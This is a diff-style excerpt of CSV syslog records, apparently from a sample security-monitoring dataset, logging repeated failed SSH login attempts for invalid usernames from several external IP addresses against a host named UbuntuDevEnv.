+4352,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:21:29,UbuntuDevEnv,2019-06-26 14:21:28,auth,UbuntuDevEnv,info,Failed password for invalid user yuanwd from 220.134.138.111 port 47280 ssh2,7295,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yuanwd,220.134.138.1,47280,,
+4353,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:21:29,UbuntuDevEnv,2019-06-26 14:21:28,auth,UbuntuDevEnv,info,Disconnected from invalid user yuanwd 220.134.138.111 port 47280 [preauth],7295,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,yuanwd,220.134.138.1,47280,,
+4354,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:21:29,UbuntuDevEnv,2019-06-26 14:21:28,auth,UbuntuDevEnv,info,Received disconnect from 220.134.138.111 port 47280:11: Bye Bye [preauth],7295,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,220.134.138.1,47280,,
+4355,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:21:30,UbuntuDevEnv,2019-06-26 14:21:30,auth,UbuntuDevEnv,info,Failed password for invalid user ts3srv from 68.183.50.149 port 33802 ssh2,7312,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3srv,68.183.50.1,33802,,
+4356,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:21:30,UbuntuDevEnv,2019-06-26 14:21:30,auth,UbuntuDevEnv,info,Received disconnect from 68.183.50.149 port 33802:11: Bye Bye [preauth],7312,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,68.183.50.1,33802,,
+4357,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:21:30,UbuntuDevEnv,2019-06-26 14:21:30,auth,UbuntuDevEnv,info,Disconnected from invalid user ts3srv 68.183.50.149 port 33802 [preauth],7312,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3srv,68.183.50.1,33802,,
+4358,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:22:05,UbuntuDevEnv,2019-06-26 14:22:05,auth,UbuntuDevEnv,info,Invalid user temp from 180.76.96.9 port 53126,7513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,temp,180.76.96.9,53126,,
+4359,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:22:05,UbuntuDevEnv,2019-06-26 14:22:05,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,7513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4360,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:22:05,UbuntuDevEnv,2019-06-26 14:22:05,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=180.76.96.9,7513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,180.76.96.9,,0,
+4361,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:22:07,UbuntuDevEnv,2019-06-26 14:22:06,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=74.94.246.82  user=test,7520,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,test,74.94.246.8,,0,
+4362,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:22:08,UbuntuDevEnv,2019-06-26 14:22:07,auth,UbuntuDevEnv,info,Failed password for invalid user temp from 180.76.96.9 port 53126 ssh2,7513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,temp,180.76.96.9,53126,,
+4363,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:22:08,UbuntuDevEnv,2019-06-26 14:22:07,auth,UbuntuDevEnv,info,Disconnected from invalid user temp 180.76.96.9 port 53126 [preauth],7513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,temp,180.76.96.9,53126,,
+4364,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:22:08,UbuntuDevEnv,2019-06-26 14:22:07,auth,UbuntuDevEnv,info,Received disconnect from 180.76.96.9 port 53126:11: Bye Bye [preauth],7513,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,180.76.96.9,53126,,
+4365,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:22:09,UbuntuDevEnv,2019-06-26 14:22:09,auth,UbuntuDevEnv,info,Failed password for test from 74.94.246.82 port 36972 ssh2,7520,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,74.94.246.8,36972,,
+4366,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:22:09,UbuntuDevEnv,2019-06-26 14:22:09,auth,UbuntuDevEnv,info,Disconnected from authenticating user test 74.94.246.82 port 36972 [preauth],7520,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,test,74.94.246.8,36972,,
+4367,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:22:09,UbuntuDevEnv,2019-06-26 14:22:09,auth,UbuntuDevEnv,info,Received disconnect from 74.94.246.82 port 36972:11: Bye Bye [preauth],7520,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,74.94.246.8,36972,,
+4368,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:22:36,UbuntuDevEnv,2019-06-26 14:22:35,auth,UbuntuDevEnv,info,Invalid user mailtest from 196.46.36.144 port 46141,7620,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mailtest,196.46.36.1,46141,,
+4369,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:22:36,UbuntuDevEnv,2019-06-26 14:22:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.46.36.144,7620,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.46.36.1,,0,
+4370,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:22:36,UbuntuDevEnv,2019-06-26 14:22:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,7620,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4371,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:22:38,UbuntuDevEnv,2019-06-26 14:22:37,auth,UbuntuDevEnv,info,Failed password for invalid user mailtest from 196.46.36.144 port 46141 ssh2,7620,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mailtest,196.46.36.1,46141,,
+4372,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:22:38,UbuntuDevEnv,2019-06-26 14:22:37,auth,UbuntuDevEnv,info,Disconnected from invalid user mailtest 196.46.36.144 port 46141 [preauth],7620,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,mailtest,196.46.36.1,46141,,
+4373,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:22:38,UbuntuDevEnv,2019-06-26 14:22:37,auth,UbuntuDevEnv,info,Received disconnect from 196.46.36.144 port 46141:11: Bye Bye [preauth],7620,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.46.36.1,46141,,
+4374,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:22:50,UbuntuDevEnv,2019-06-26 14:22:50,auth,UbuntuDevEnv,info,Invalid user charlie from 180.76.96.9 port 58236,7673,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,charlie,180.76.96.9,58236,,
+4375,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:22:50,UbuntuDevEnv,2019-06-26 14:22:50,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=180.76.96.9,7673,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,180.76.96.9,,0,
+4376,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:22:50,UbuntuDevEnv,2019-06-26 14:22:50,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,7673,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4377,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:22:52,UbuntuDevEnv,2019-06-26 14:22:51,auth,UbuntuDevEnv,info,Failed password for invalid user charlie from 180.76.96.9 port 58236 ssh2,7673,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,charlie,180.76.96.9,58236,,
+4378,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:22:52,UbuntuDevEnv,2019-06-26 14:22:52,auth,UbuntuDevEnv,info,Disconnected from invalid user charlie 180.76.96.9 port 58236 [preauth],7673,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,charlie,180.76.96.9,58236,,
+4379,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:22:52,UbuntuDevEnv,2019-06-26 14:22:52,auth,UbuntuDevEnv,info,Received disconnect from 180.76.96.9 port 58236:11: Bye Bye [preauth],7673,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,180.76.96.9,58236,,
+4380,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:23:01,UbuntuDevEnv,2019-06-26 14:23:01,auth,UbuntuDevEnv,info,Invalid user firebird from 68.183.50.149 port 50750,7716,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,firebird,68.183.50.1,50750,,
+4381,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:23:01,UbuntuDevEnv,2019-06-26 14:23:01,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,7716,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4382,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:23:01,UbuntuDevEnv,2019-06-26 14:23:01,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=68.183.50.149,7716,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,68.183.50.1,,0,
+4383,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:23:03,UbuntuDevEnv,2019-06-26 14:23:03,auth,UbuntuDevEnv,info,Failed password for invalid user firebird from 68.183.50.149 port 50750 ssh2,7716,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,firebird,68.183.50.1,50750,,
+4384,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:23:03,UbuntuDevEnv,2019-06-26 14:23:03,auth,UbuntuDevEnv,info,Received disconnect from 68.183.50.149 port 50750:11: Bye Bye [preauth],7716,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,68.183.50.1,50750,,
+4385,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:23:03,UbuntuDevEnv,2019-06-26 14:23:03,auth,UbuntuDevEnv,info,Disconnected from invalid user firebird 68.183.50.149 port 50750 [preauth],7716,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,firebird,68.183.50.1,50750,,
+4386,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:23:12,UbuntuDevEnv,2019-06-26 14:23:12,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,7758,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4387,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:23:12,UbuntuDevEnv,2019-06-26 14:23:12,auth,UbuntuDevEnv,info,Invalid user torrent from 220.134.138.111 port 36140,7758,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,torrent,220.134.138.1,36140,,
+4388,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:23:12,UbuntuDevEnv,2019-06-26 14:23:12,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=220.134.138.111,7758,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,220.134.138.1,,0,
+4389,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:23:14,UbuntuDevEnv,2019-06-26 14:23:14,auth,UbuntuDevEnv,info,Failed password for invalid user torrent from 220.134.138.111 port 36140 ssh2,7758,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,torrent,220.134.138.1,36140,,
+4390,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:23:15,UbuntuDevEnv,2019-06-26 14:23:14,auth,UbuntuDevEnv,info,Received disconnect from 220.134.138.111 port 36140:11: Bye Bye [preauth],7758,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,220.134.138.1,36140,,
+4391,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:23:15,UbuntuDevEnv,2019-06-26 14:23:14,auth,UbuntuDevEnv,info,Disconnected from invalid user torrent 220.134.138.111 port 36140 [preauth],7758,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,torrent,220.134.138.1,36140,,
+4392,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:23:35,UbuntuDevEnv,2019-06-26 14:23:35,auth,UbuntuDevEnv,info,Invalid user leon from 180.76.96.9 port 35086,7836,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,leon,180.76.96.9,35086,,
+4393,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:23:35,UbuntuDevEnv,2019-06-26 14:23:35,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=180.76.96.9,7836,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,180.76.96.9,,0,
+4394,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:23:35,UbuntuDevEnv,2019-06-26 14:23:35,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,7836,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4395,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:23:37,UbuntuDevEnv,2019-06-26 14:23:37,auth,UbuntuDevEnv,info,Failed password for invalid user leon from 180.76.96.9 port 35086 ssh2,7836,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,leon,180.76.96.9,35086,,
+4396,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:23:37,UbuntuDevEnv,2019-06-26 14:23:37,auth,UbuntuDevEnv,info,Received disconnect from 180.76.96.9 port 35086:11: Bye Bye [preauth],7836,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,180.76.96.9,35086,,
+4397,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:23:37,UbuntuDevEnv,2019-06-26 14:23:37,auth,UbuntuDevEnv,info,Disconnected from invalid user leon 180.76.96.9 port 35086 [preauth],7836,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,leon,180.76.96.9,35086,,
+4398,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:24:19,UbuntuDevEnv,2019-06-26 14:24:19,auth,UbuntuDevEnv,info,Invalid user weblogic from 180.76.96.9 port 40182,7988,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,weblogic,180.76.96.9,40182,,
+4399,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:24:19,UbuntuDevEnv,2019-06-26 14:24:19,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=180.76.96.9,7988,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,180.76.96.9,,0,
+4400,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:24:19,UbuntuDevEnv,2019-06-26 14:24:19,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,7988,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4401,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:24:21,UbuntuDevEnv,2019-06-26 14:24:21,auth,UbuntuDevEnv,info,Failed password for invalid user weblogic from 180.76.96.9 port 40182 ssh2,7988,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,weblogic,180.76.96.9,40182,,
+4402,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:24:22,UbuntuDevEnv,2019-06-26 14:24:21,auth,UbuntuDevEnv,info,Received disconnect from 180.76.96.9 port 40182:11: Bye Bye [preauth],7988,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,180.76.96.9,40182,,
+4403,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:24:22,UbuntuDevEnv,2019-06-26 14:24:21,auth,UbuntuDevEnv,info,Disconnected from invalid user weblogic 180.76.96.9 port 40182 [preauth],7988,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,weblogic,180.76.96.9,40182,,
+4404,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:24:28,UbuntuDevEnv,2019-06-26 14:24:28,auth,UbuntuDevEnv,info,Invalid user maxwell from 68.183.50.149 port 39472,8036,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,maxwell,68.183.50.1,39472,,
+4405,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:24:28,UbuntuDevEnv,2019-06-26 14:24:28,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,8036,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+4406,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:24:28,UbuntuDevEnv,2019-06-26 14:24:28,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=68.183.50.149,8036,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,68.183.50.1,,0,
+4407,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:24:30,UbuntuDevEnv,2019-06-26 14:24:29,auth,UbuntuDevEnv,info,Failed password for invalid user maxwell from 68.183.50.149 port 39472 ssh2,8036,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,maxwell,68.183.50.1,39472,,
+4408,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:24:30,UbuntuDevEnv,2019-06-26 14:24:29,auth,UbuntuDevEnv,info,Disconnected from invalid user maxwell 68.183.50.149 port 39472 [preauth],8036,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,maxwell,68.183.50.1,39472,,
+4409,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:24:30,UbuntuDevEnv,2019-06-26 14:24:29,auth,UbuntuDevEnv,info,Received disconnect from 68.183.50.149 port 39472:11: Bye Bye [preauth],8036,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,68.183.50.1,39472,,
+4410,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:24:55,UbuntuDevEnv,2019-06-26 14:24:55,auth,UbuntuDevEnv,info,Invalid user webprog from 220.134.138.111 port 53224,8122,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,webprog,220.134.138.1,53224,,
+4411,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:24:55,UbuntuDevEnv,2019-06-26 14:24:55,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,8122,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
